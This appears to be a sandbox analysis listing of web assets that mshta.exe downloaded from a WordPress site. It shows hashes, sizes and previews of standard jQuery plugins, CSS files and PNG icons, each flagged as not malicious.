                                        Preview:/*. * jPlayer Plugin for jQuery JavaScript Library. * http://www.jplayer.org. *. * Copyright (c) 2009 - 2014 Happyworm Ltd. * Licensed under the MIT license.. * http://opensource.org/licenses/MIT. *. * Author: Mark J Panaghiston. * Version: 2.6.0. * Date: 2nd April 2014. */..(function(b,f){"function"===typeof define&&define.amd?define(["jquery"],f):b.jQuery?f(b.jQuery):f(b.Zepto)})(this,function(b,f){b.fn.jPlayer=function(a){var c="string"===typeof a,d=Array.prototype.slice.call(arguments,1),e=this;a=!c&&d.length?b.extend.apply(null,[!0,a].concat(d)):a;if(c&&"_"===a.charAt(0))return e;c?this.each(function(){var c=b(this).data("jPlayer"),h=c&&b.isFunction(c[a])?c[a].apply(c,d):c;if(h!==c&&h!==f)return e=h,!1}):this.each(function(){var c=b(this).data("jPlayer");c?c.option(a||.{}):b(this).data("jPlayer",new b.jPlayer(a,this))});return e};b.jPlayer=function(a,c){if(arguments.length){this.element=b(c);this.options=b.extend(!0,{},this.options,a);var d=this;this.element.bind("remove.jPlayer",
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):20669
                                        Entropy (8bit):5.2808077876911295
                                        Encrypted:false
                                        SSDEEP:384:3ORjoixwByWeRZELR0oXnl0HFuG/76GIPGQHv5clO9sdG:3CZHEf6FuG/0um5cAQG
                                        MD5:588A4C7A711E01405E02B4E2F8E1B2D6
                                        SHA1:263D200778CB34026816AE5A7718C5AE4F6AEC49
                                        SHA-256:C9E8F0F8A438833EF971B7482991C681FFB7FB5BFF9B16CEADB22AD7C174A29E
                                        SHA-512:86DBD71D944B3F03F20A62E57E1CFA202D306E97102C6EB2EADE78D672E43227B1C6508B799AD88FB0D3516664CF4726D3E9C1119D5A05381B48A3912E34E688
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.magnific-popup.min.js?ver=0.9.3
                                        Preview:/*! Magnific Popup - v0.9.3 - 2013-07-16.* http://dimsemenov.com/plugins/magnific-popup/.* Copyright (c) 2013 Dmitry Semenov; */.(function(e){var t,i,n,o,a,r,s,l="Close",c="BeforeClose",d="AfterClose",u="BeforeAppend",p="MarkupParse",f="Open",m="Change",g="mfp",v="."+g,h="mfp-ready",C="mfp-removing",y="mfp-prevent-close",w=function(){},b=!!window.jQuery,I=e(window),x=function(e,i){t.ev.on(g+e+v,i)},k=function(t,i,n,o){var a=document.createElement("div");return a.className="mfp-"+t,n&&(a.innerHTML=n),o?i&&i.appendChild(a):(a=e(a),i&&a.appendTo(i)),a},T=function(i,n){t.ev.triggerHandler(g+i,n),t.st.callbacks&&(i=i.charAt(0).toLowerCase()+i.slice(1),t.st.callbacks[i]&&t.st.callbacks[i].apply(t,e.isArray(n)?n:[n]))},E=function(){(t.st.focus?t.content.find(t.st.focus).eq(0):t.wrap).trigger("focus")},S=function(i){return i===s&&t.currTemplate.closeBtn||(t.currTemplate.closeBtn=e(t.st.closeMarkup.replace("%title%",t.st.tClose)),s=i),t.currTemplate.closeBtn},P=function(){e.magnificPopup.instan
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:HTML document, ASCII text
                                        Category:downloaded
                                        Size (bytes):2074
                                        Entropy (8bit):5.0968137085902505
                                        Encrypted:false
                                        SSDEEP:48:MD00ieaw9PS+mQeavhBFxQDgaQEqMeDPs11Uix4gWl5aBn2vUys2O:6haw9PS+oenaDQEqMeDPuUG++2K2O
                                        MD5:77DDDC6C72834DC757EB755B46C00F8D
                                        SHA1:894745AF5CF26EB10DFE28F3BB0C6B2C7B0C286B
                                        SHA-256:C5F36FC1D0410B310F27E21BA0C948B9E6914F41C119D02C4629CA894D177A1E
                                        SHA-512:D13DE2DF355B214C25943E1859C595CBF51AF4854E94093B457B2C99DA66D9F9308DA8A94404F4240811B1A50BA3C2A28316E460964C3A5C0EDCC3B2F03161B3
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobilemenu.js?ver=1.0
                                        Preview:/**. * jQuery Mobile Menu. * Turn unordered list menu into dropdown select menu. * version 1.0(31-OCT-2011). *. * Built on top of the jQuery library. * http://jquery.com. *. * Documentation. * http://github.com/mambows/mobilemenu. */.(function($){..$.fn.mobileMenu = function(options) {...var defaults = {.....defaultText: 'Navigate to...',.....className: 'select-menu',.....subMenuClass: 'sub-menu',.....subMenuDash: '&ndash;'.....},....settings = $.extend( defaults, options ),....el = $(this);....$("head").append('<style type="text/css">@media(max-width: 767px){.sf-menu{display:none;} .select-menu{display: block;}}</style>')....this.each(function(){....// ad class to submenu list....el.find('ul').addClass(settings.subMenuClass);.....// Create base menu....$('<select />',{'class':settings.className}).insertAfter(el);.....// Create default option....$('<option />', {"value":'#', "text":settings.defaultText}).appendTo( '.' + settings.className );.....// Create select option from menu...
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines, with no line terminators
                                        Category:downloaded
                                        Size (bytes):10762
                                        Entropy (8bit):5.077152335060303
                                        Encrypted:false
                                        SSDEEP:192:UJrUdgSDnkqTJT3De0no2zDEJEBk/UdjwUSPh/im9X:UJvSDnTJTa0nocEJrUdjwUSJ/im9X
                                        MD5:83587A80FA209ADBA2AE7D9C7D817790
                                        SHA1:0AD068CE6FB22A723676D786D0F5AA8922E34814
                                        SHA-256:3454594300968DF56A52E0EF020632006412FB99ABEF27D917E21A715C586225
                                        SHA-512:527C20333ED686C4382B5D2651AA94B202A8E180BCC36954B0395DBB0E5AD4E285882049BE2C9BF245522490AF012E98DE0931E3CFB24F7147F3811CE2DFE440
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0
                                        Preview:(function(a){a.fn.zAccordion=function(e){var d={timeout:6000,width:null,slideWidth:null,tabWidth:null,height:null,startingSlide:0,slideClass:null,easing:null,speed:1200,auto:true,trigger:"click",pause:true,invert:false,animationStart:function(){},animationComplete:function(){},buildComplete:function(){},errors:false},c={displayError:function(g,f){if(window.console&&f){console.log("zAccordion: "+g+".")}},findChildElements:function(f){if(f.children().get(0)===undefined){return false}else{return true}},getNext:function(g,h){var f=h+1;if(f>=g){f=0}return f},fixHeight:function(f){if((f.height===null)&&(f.slideHeight!==undefined)){f.height=f.slideHeight;return true}else{if((f.height!==null)&&(f.slideHeight===undefined)){return true}else{if((f.height===null)&&(f.slideHeight===undefined)){return false}}}},getUnits:function(f){if(f!==null){if(f.toString().indexOf("%")>-1){return"%"}else{if(f.toString().indexOf("px")>-1){return"px"}else{return"px"}}}},toInteger:function(f){if(f!==null){return pa
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:downloaded
                                        Size (bytes):3006
                                        Entropy (8bit):4.209501226216895
                                        Encrypted:false
                                        SSDEEP:48:N10K1DK3whocmVMBCu2m+JI/QNAIslqw+Pw6z:NSqDK3sN+JWkF/H
                                        MD5:7B766A62E26ADB736A822B315A891025
                                        SHA1:A2580B9177A2CA0ACB345FE440414DE7DF2A5E26
                                        SHA-256:65CA4BF164BFD1056D4AF9E83F40FB8B4D51840485D9A09021468BB3F5AAAC76
                                        SHA-512:8FE2938731EBB108F8797DA1D46CEB7E353131D770633FB9AF4E36BE48D19B912742028E86B0D7AF5587A19A328AD0E6C2945B550E2C347482375A1C10CE88A6
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/js/logo-slider-wp-public.js?ver=1.0.0
                                        Preview:(function() {.. 'use strict';.... /**.. * All of the code for your public-facing JavaScript source.. * should reside in this file... *.. * Note: It has been assumed you will write jQuery code here, so the.. * $ function reference has been prepared for usage within the scope.. * of this function... *.. * This enables you to define handlers, for when the DOM is ready:.. *.. * $(function() {... *... * });.. *.. * When the window is loaded:.. *.. * $( window ).load(function() {... *... * });.. *.. * ...and/or other possibilities... *.. * Ideally, it is not considered best practise to attach more than a.. * single DOM-ready or window-load handler for a particular page... * Although scripts in the WordPress core, Plugins and Themes may be.. * practising this, we should strive to set a better example in our own work... */...... jQuery(document).ready(function($) {.... $('.lgx-logo-carousel'
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):9304
                                        Entropy (8bit):4.884999133560261
                                        Encrypted:false
                                        SSDEEP:192:hNQeaSgt1RlPZpFXWi6fEKJHFiN6/kw57F5fmu4xCEBvL:uTPdXDlwFdF5On
                                        MD5:33F641DF8C0FC8A2A5C9C7FAD61EC019
                                        SHA1:7E4999E434F83D66A6E436DA9373880C47289704
                                        SHA-256:690587B44CBF9FF5EFA013957F8460D96B36775ACBB27472CFB6DC34BB91AF4D
                                        SHA-512:910F7FD759FD016EED7C7707E971DAAD57DB08D5CE421D7C94B43CCCCB67440654B87CC2FA3B75C28DC77DBE77C017B2EB7A1BE38436061AE9CF177F1FA900BB
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/CherryFramework/css/magnific-popup.css?ver=0.9.3
                                        Preview:/* Magnific Popup CSS */..mfp-bg {. top: 0;. left: 0;. width: 100%;. height: 100%;. z-index: 1042;. overflow: hidden;. position: fixed;. background: #0b0b0b;. opacity: 0.8;. filter: alpha(opacity=80); }...mfp-wrap {. top: 0;. left: 0;. width: 100%;. height: 100%;. z-index: 1043;. position: fixed;. outline: none !important;. -webkit-backface-visibility: hidden; }...mfp-container {. text-align: center;. position: absolute;. width: 100%;. height: 100%;. left: 0;. top: 0;. padding: 0 8px;. -webkit-box-sizing: border-box;. -moz-box-sizing: border-box;. box-sizing: border-box; }...mfp-container:before {. content: '';. display: inline-block;. height: 100%;. vertical-align: middle; }...mfp-align-top .mfp-container:before {. display: none; }...mfp-content {. position: relative;. display: inline-block;. vertical-align: middle;. margin: 0 auto;. text-align: left;. z-index: 1045; }...mfp-inline-holder .mfp-content,..mfp-ajax-holder .mfp-content {. width: 100
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):70411
                                        Entropy (8bit):5.127502328619063
                                        Encrypted:false
                                        SSDEEP:384:djgWEVPPo2Oe+fAwE+ZLBdOK1yPRFH1gXnSGPEIQS1hEZNx2+:XrOK1yPRAXpbENx/
                                        MD5:8C58B6C64504AEC029A5EB64FDA110C7
                                        SHA1:CC0F3354640103B329923BA00054F750578CB78F
                                        SHA-256:E0AFECC6055391B4B65D6350F8D05387DF73467D3D8C0DC53CC1AC5CB7B639EA
                                        SHA-512:5B631A9F5E916321BB23D8FD90BF27394591FB83A1BA2CA8E9976A3875FFB0DECC0A97DD64C516D165814F01F909D9B1B4E1D1A008B76F1C1EE8C4A7747B2A8B
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/theme51253/main-style.css
                                        Preview:@import url("../CherryFramework/style.css");.@import url(//fonts.googleapis.com/css?family=Lato:100);.@import url(//fonts.googleapis.com/css?family=Lato:300);.@import url(//fonts.googleapis.com/css?family=Lato:400);.@import url(//fonts.googleapis.com/css?family=Lato:700);.@import url(//fonts.googleapis.com/css?family=Lato:900);..wrap { overflow:hidden; }.h1, h2, h3, h4, h5, h6 { margin-top:0; }.h2 {..font-weight:100 !important;..text-shadow:0 0 0 rgba(0,0,0,0);.}.h2 strong { font-weight:900 !important; }.h3 { font-weight:900 !important; }.a {..-webkit-transition:all 0.5s ease;..-moz-transition:all 0.5s ease;..-o-transition:all 0.5s ease;..transition:all 0.5s ease;.}.a:hover { text-decoration:none; }..header {..width:100%;..position:absolute;..top:0;..padding:23px 0 20px;..border:none;..background:#fff;.}.@media (max-width: 767px) {...header {...width:auto;...padding-left:20px;...padding-right:20px;...position:relative !important;..}.}..header:after {..content:'';..position:absolute;..b
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):3351
                                        Entropy (8bit):4.914211238199009
                                        Encrypted:false
                                        SSDEEP:48:uZo8LL+IJWmQq+v+dDKopvu+ztL+F/+wI+weAzT+RV+VAPsAvqeghOHHy3VzoRvO:JgA6eA2+AbdEK7pcXVxZaIJICNMM
                                        MD5:B2752A850D44F50036628EEAEF3BFCFA
                                        SHA1:FBA46353CF90450EF3D362A123F1E7AF3E8C561E
                                        SHA-256:521410E1FC44780061E09ADC980275FB5EA277FD5D9E538454214EC4379FF4BC
                                        SHA-512:B52DD2E6A1B40658674113B2257BCD8DE10CE14A4C5C7AD07D31A66D0D602A67A50B195210151AC614418FF1054F3A5B3F84554ABA448A46E6749A1B0AF844DE
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/lib/owl/assets/owl.carousel.min.css?ver=1.0.0
                                        Preview:/**. * Owl Carousel v2.3.4. * Copyright 2013-2018 David Deutsch. * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE. */..owl-carousel,.owl-carousel .owl-item{-webkit-tap-highlight-color:transparent;position:relative}.owl-carousel{display:none;width:100%;z-index:1}.owl-carousel .owl-stage{position:relative;-ms-touch-action:pan-Y;touch-action:manipulation;-moz-backface-visibility:hidden}.owl-carousel .owl-stage:after{content:".";display:block;clear:both;visibility:hidden;line-height:0;height:0}.owl-carousel .owl-stage-outer{position:relative;overflow:hidden;-webkit-transform:translate3d(0,0,0)}.owl-carousel .owl-item,.owl-carousel .owl-wrapper{-webkit-backface-visibility:hidden;-moz-backface-visibility:hidden;-ms-backface-visibility:hidden;-webkit-transform:translate3d(0,0,0);-moz-transform:translate3d(0,0,0);-ms-transform:translate3d(0,0,0)}.owl-carousel .owl-item{min-height:1px;float:left;-webkit-backface-visibility:hidden;-webkit-touch-ca
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:UTF-8 Unicode text, with very long lines
                                        Category:downloaded
                                        Size (bytes):89992
                                        Entropy (8bit):5.084392122174397
                                        Encrypted:false
                                        SSDEEP:1536:owLoreUC7AuLMjvNlP8GNMBJ6IcIhKJQIOybQOoiYM9OJ0QQKOv:oUMNlPBqJTuOGQOotEhKOv
                                        MD5:CCDF893E7D8B26933AF0C336BCC3943E
                                        SHA1:AC575BA3377F95EF22BAD865EC35B0B3DCB0DFE0
                                        SHA-256:DB9D6CF3C1C4B047C62F646E7D9991C06A212931C362BF53F9A2406B30F09466
                                        SHA-512:818DB99C2EB775D1342DC2CF871509185C5AD86A08C80E452F29B8509A870C43078E9F11113E999FF487A35B25B6DDD6B95B6A7F2C4408FDFCFDD69473F59510
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/lib/owl/owl.carousel.js?ver=1.0.0
                                        Preview:/**. * Owl Carousel v2.3.4. * Copyright 2013-2018 David Deutsch. * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE. */./**. * Owl carousel. * @version 2.3.4. * @author Bartosz Wojciechowski. * @author David Deutsch. * @license The MIT License (MIT). * @todo Lazy Load Icon. * @todo prevent animationend bubling. * @todo itemsScaleUp. * @todo Test Zepto. * @todo stagePadding calculate wrong active classes. */.;(function($, window, document, undefined) {.../**.. * Creates a carousel... * @class The Owl Carousel... * @public.. * @param {HTMLElement|jQuery} element - The element to create the carousel for... * @param {Object} [options] - The options.. */..function Owl(element, options) {..../**... * Current settings for the carousel.... * @public... */...this.settings = null;..../**... * Current options set by the caller including defaults.... * @public... */...this.options = $.extend({}, Owl.Defaults, options);..../**... * Plugin element.... *
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):1013
                                        Entropy (8bit):5.21364895278629
                                        Encrypted:false
                                        SSDEEP:24:0/emCtetORzuZiqMdhuzTqgfkPH2nouoKLn7tk8:uZo8WSZiqMAqgfW8L9d
                                        MD5:594B81805A98B267E47C70A8FAD30D9F
                                        SHA1:684D84EC40B305CA14EFC88C91F12972CB6342B4
                                        SHA-256:924B0DC630D1C5DFF9FA31AEAD9509775B1D476BFE0A5AC2977B2F11205A26AC
                                        SHA-512:B0C5ED30D2F5CD1CE894760A12E8CCD80A822D447D1760B8FF4E5C75BC638CB491BCC40872210F090668FBE9E4EE0A3706D4AE2BD91F6BFB3E6B87F88B9A4B93
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets//lib/owl/assets/owl.theme.default.min.css?ver=1.0.0
                                        Preview:/**. * Owl Carousel v2.3.4. * Copyright 2013-2018 David Deutsch. * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE. */..owl-theme .owl-dots,.owl-theme .owl-nav{text-align:center;-webkit-tap-highlight-color:transparent}.owl-theme .owl-nav{margin-top:10px}.owl-theme .owl-nav [class*=owl-]{color:#FFF;font-size:14px;margin:5px;padding:4px 7px;background:#D6D6D6;display:inline-block;cursor:pointer;border-radius:3px}.owl-theme .owl-nav [class*=owl-]:hover{background:#869791;color:#FFF;text-decoration:none}.owl-theme .owl-nav .disabled{opacity:.5;cursor:default}.owl-theme .owl-nav.disabled+.owl-dots{margin-top:10px}.owl-theme .owl-dots .owl-dot{display:inline-block;zoom:1}.owl-theme .owl-dots .owl-dot span{width:10px;height:10px;margin:5px 7px;background:#D6D6D6;display:block;-webkit-backface-visibility:visible;transition:opacity .2s ease;border-radius:30px}.owl-theme .owl-dots .owl-dot.active span,.owl-theme .owl-dots .owl-dot:hover span{backgr
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):66002
                                        Entropy (8bit):5.19992445499213
                                        Encrypted:false
                                        SSDEEP:768:RnQmALZc3HQApqPQ5j2m7Y414TtS6c9eu4SqSIGyU8O/sXi:+mN3kQ5noSWqyU8O/sXi
                                        MD5:47F3B539EC47105303FE88C5B4DB8BB8
                                        SHA1:7452E7208C3718CF250E126015876A0D09576818
                                        SHA-256:B6DF3EA0DB277CDC16BD73D0D3FC2422976E289F3C6E181E5EDF46AADA3B21C1
                                        SHA-512:70311C6FA62A73C78FAF2974E39B39C35C7413BE826A050D22E06E8C1FB695672063EE84D883F8D737F8578DC86CE2B64BD01B2E97D45DA84AA9A233ECCF3EA2
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/CherryFramework/css/style.css
                                        Preview:body { position:relative; }..ie8 body { min-width:980px; }.@media (max-width: 767px) {..body.cherry-fixed-layout {...padding-left:0 !important;...padding-right:0 !important;..}.}.@media (max-width: 767px) {..body.cherry-fixed-layout .header, body.cherry-fixed-layout .content-holder, body.cherry-fixed-layout .footer {...padding-left:20px;...padding-right:20px;..}.}.body[class*="span"] {..position:static;..float:none;..min-height:inherit;..margin-left:inherit;.}.a { outline:none; }.a:focus { outline:none; }..main-holder {..position:relative;..z-index:1;.}..cherry-fixed-layout .main-holder {..margin:0 auto;..max-width:980px;..width:auto;..background:#fafafa;.}.@media (min-width: 1200px) {...cherry-fixed-layout .main-holder { max-width:1210px; }.}.@media (min-width: 768px) and (max-width: 979px) {...cherry-fixed-layout .main-holder { max-width:764px; }.}..header {..position:relative;..z-index:99;..padding:30px 0;..border-bottom:1px solid #DDD;..background-color:#eee;.}..logo {..position:re
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):2506
                                        Entropy (8bit):4.979495337243772
                                        Encrypted:false
                                        SSDEEP:48:LXyO+4lW7dPr2StXZU/X2cQmoWUTp9XlUgpd2HuUBHrX:LXFLlWPXZKGrmwTO8quUtL
                                        MD5:D75AE5B4F9859E20DABD5BA0E6959625
                                        SHA1:B72540421BD54F42D92734D0A53D46273839811D
                                        SHA-256:294E2CE69040E1C6B4574E88881619342EDA4D098C187E56317288CE7B0E6168
                                        SHA-512:AA5239F962F9756781FE1907F3A7CE7A6FC4E92ED3D862B02460E69ADCDDE3DB98D82D6B3084BF096F32C966D258F561B81345620151A466B7BBC5B1EE982DBD
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0
                                        Preview:(function($){..$.fn.tmStickUp=function(options){....var getOptions = {....correctionSelector: $('.correctionSelector')...,.listenSelector: $('.listenSelector')...,.active: false...,.pseudo: true...}...$.extend(getOptions, options);....var...._this = $(this)...,._window = $(window)...,._document = $(document)...,.thisOffsetTop = 0...,.thisOuterHeight = 0...,.thisMarginTop = 0...,.thisPaddingTop = 0...,.documentScroll = 0...,.pseudoBlock...,.lastScrollValue = 0...,.scrollDir = ''...,.tmpScrolled...;....if (_this.length != 0) {....init();...}....function init(){....thisOffsetTop = parseInt(_this.offset().top);....thisMarginTop = parseInt(_this.css("margin-top"));....thisOuterHeight = parseInt(_this.outerHeight(true));.....if(getOptions.pseudo){.....$('<div class="pseudoStickyBlock"></div>').insertAfter(_this);.....pseudoBlock = $('.pseudoStickyBlock');.....pseudoBlock.css({"position":"relative", "display":"block"});....}.....if(getOptions.active){.....addEventsFunction();....}...}//end in
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:PNG image data, 31 x 19, 8-bit/color RGBA, non-interlaced
                                        Category:downloaded
                                        Size (bytes):1370
                                        Entropy (8bit):6.548363017537382
                                        Encrypted:false
                                        SSDEEP:24:ka1he91WwylZ82lYSqMHiwe76ceVc7cxT3ouyJ3V8BGy0QcJLJgSApYg1:zqQinNuiF61q7uIJ30D07JVgtpYi
                                        MD5:DF0D428C42D964F07B5C2875B85AB1EC
                                        SHA1:42ACD8E7E0919A99D42F09A62CD0B5FC0CE59B43
                                        SHA-256:E50B8D2007404AA7FC5484E29160C652C61433EC2732C37B9FEAF0ECC60E45A0
                                        SHA-512:A973C4169AD4C9C74F392821E64C5FFB17A7A44FE0517B836409CB8C79EB9D296F6E9B6C420C66227D6E11C7211E327D370A4E9447E47D448B4947551AB6610B
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.png
                                        Preview:.PNG........IHDR.............hl.B....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="xmp.did:02801174072068118DBBF50001D62B81" xmpMM:DocumentID="xmp.did:647017FE37C611E2B91CD562C5788E4E" xmpMM:InstanceID="xmp.iid:647017FD37C611E2B91CD562C5788E4E" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4265089B3F2FE211AC7CD87861E56C7E" stRef:documentID="xmp.did:02801174072068118DBBF50001D62B81"/> </rdf:Description> </rdf:RDF> </x:x
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines, with no line terminators
                                        Category:downloaded
                                        Size (bytes):1391
                                        Entropy (8bit):5.13936657531626
                                        Encrypted:false
                                        SSDEEP:24:XUdqIoZ2zsben5WlLysyIOKI1mQqRhoj3v2rFEgRuLUMB9/RUCXXmC3+:XUyEsyKystOKumTsOrFEmu7Bl6CX2Q+
                                        MD5:570AE0F3C201604926EA599D3D1F6C04
                                        SHA1:2C29243A73660964D4712B969D2A15E27777BC14
                                        SHA-256:5138D39633DC69FCD0ED7F33A5E38DC339123F682FA7F5242066879C2BBC8C9B
                                        SHA-512:44583F156E95AA16D20ED8DB8421001D9B7257B56B4FFF1E0378760406B4D6EB2B1315D28AD4F3F489A7733814B2FB2DDDF8F28004DAAEEE8D9BF4EA22A2742E
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-includes/js/wp-embed.min.js?ver=4.9.20
                                        Preview:!function(c,d){"use strict";var e=!1,n=!1;if(d.querySelector)if(c.addEventListener)e=!0;if(c.wp=c.wp||{},!c.wp.receiveEmbedMessage)if(c.wp.receiveEmbedMessage=function(e){var t=e.data;if(t)if(t.secret||t.message||t.value)if(!/[^a-zA-Z0-9]/.test(t.secret)){for(var r,a,i,s=d.querySelectorAll('iframe[data-secret="'+t.secret+'"]'),n=d.querySelectorAll('blockquote[data-secret="'+t.secret+'"]'),o=0;o<n.length;o++)n[o].style.display="none";for(o=0;o<s.length;o++)if(r=s[o],e.source===r.contentWindow){if(r.removeAttribute("style"),"height"===t.message){if(1e3<(i=parseInt(t.value,10)))i=1e3;else if(~~i<200)i=200;r.height=i}if("link"===t.message)if(a=d.createElement("a"),i=d.createElement("a"),a.href=r.getAttribute("src"),i.href=t.value,i.host===a.host)if(d.activeElement===r)c.top.location.href=t.value}}},e)c.addEventListener("message",c.wp.receiveEmbedMessage,!1),d.addEventListener("DOMContentLoaded",t,!1),c.addEventListener("load",t,!1);function t(){if(!n){n=!0;for(var e,t,r=-1!==navigator.appV
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:PNG image data, 5 x 3, 8-bit/color RGBA, non-interlaced
                                        Category:downloaded
                                        Size (bytes):208
                                        Entropy (8bit):5.9194278840524825
                                        Encrypted:false
                                        SSDEEP:3:yionv//thPlgolljvrtxBlly43gqwkBDjW3PsFmzRgK3MkOl0tDlWyxtl22Wf4Fm:6v/lhP+4ZQynDi3U6GCMkdVx22W7dp
                                        MD5:20A650477130C7C2C62C5647131F545B
                                        SHA1:4615101FCC5DF1FAB3E7DD516D058E1052A8FCB2
                                        SHA-256:068F35DD132804C7EFFCBCA65F9398D34351339ED2FA7B20EF5E9A6221E76516
                                        SHA-512:9B5F312C3CE5E504DE7B2B1EE4BDF21F8A27E04329B2793E12F685D70E53D02CBB5E3094F83950573E814303900B77F099331DD4106FB534773D6D60736CA003
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/gtranslate/arrow_down.png
                                        Preview:.PNG........IHDR.............[6......sBIT....|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS4.......tEXtCreation Time.01/09/10......(IDAT..]....0..@....G..HUy........`.FM[......[..g....IEND.B`.
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines, with no line terminators
                                        Category:downloaded
                                        Size (bytes):15140
                                        Entropy (8bit):5.208958193254912
                                        Encrypted:false
                                        SSDEEP:384:R8xYxpW3Jzw4g0mCZuUwG8Su9uteW5GF1Eh:R8expW3JzwbCUUC3GGf2
                                        MD5:C3AFA9C619C14F0C3B0CA0BB13F12BD9
                                        SHA1:F3A2FE1CD8A2A51B7EBFE402D983DC7F16DBA5AA
                                        SHA-256:DE56C5F70EA565FDC866ADE91C95AB84151F55E030F861B3509141B24FD54733
                                        SHA-512:74B50CA4FC1D2EB7E6855036CEC9E86ECCA75BF8E05A965D5424B14551F4EC1969A3F94327E8042A48F2EF826D0F27166ACD1479D3105B814325708B4222FBB6
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/motopress-content-editor/bootstrap/bootstrap-grid.min.css?ver=1.5.8
                                        Preview:.mp-row{margin-left:-20px;*zoom:1}.mp-row:before,.mp-row:after{display:table;content:"";line-height:0}.mp-row:after{clear:both}[class*="mp-span"]{float:left;min-height:1px;margin-left:20px}.mp-container{width:940px}.mp-span12{width:940px}.mp-span11{width:860px}.mp-span10{width:780px}.mp-span9{width:700px}.mp-span8{width:620px}.mp-span7{width:540px}.mp-span6{width:460px}.mp-span5{width:380px}.mp-span4{width:300px}.mp-span3{width:220px}.mp-span2{width:140px}.mp-span1{width:60px}.mp-offset12{margin-left:980px}.mp-offset11{margin-left:900px}.mp-offset10{margin-left:820px}.mp-offset9{margin-left:740px}.mp-offset8{margin-left:660px}.mp-offset7{margin-left:580px}.mp-offset6{margin-left:500px}.mp-offset5{margin-left:420px}.mp-offset4{margin-left:340px}.mp-offset3{margin-left:260px}.mp-offset2{margin-left:180px}.mp-offset1{margin-left:100px}.mp-row-fluid{width:100%;*zoom:1;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}.mp-row-fluid:before,.mp-row-fluid:after{dis
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):19761
                                        Entropy (8bit):5.458312135639062
                                        Encrypted:false
                                        SSDEEP:384:bpO1nM9u0BDwt0u/9jydPsRKiyd+sbyWwDHdQPy0MaryWuDHdQ1Q58:Gwumwt0uVmeKIsiKpAaH
                                        MD5:6806368C6A0BF73A5236B452FD5C2332
                                        SHA1:250B6DE151107A11DA015D052CE89D1FE042F23D
                                        SHA-256:835526E45335B67067D09FEF4876BEB46F6557A357CD6F3EDA61284612983A0D
                                        SHA-512:D4278F7706EE8631F4DCD910D6247E4A80D1B6BD20B3484F23A039779F951B75BA62EE379EDAE9D4FF6D06A9814F96122481539DF590D9F8E781F4E4C3876D6B
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.0
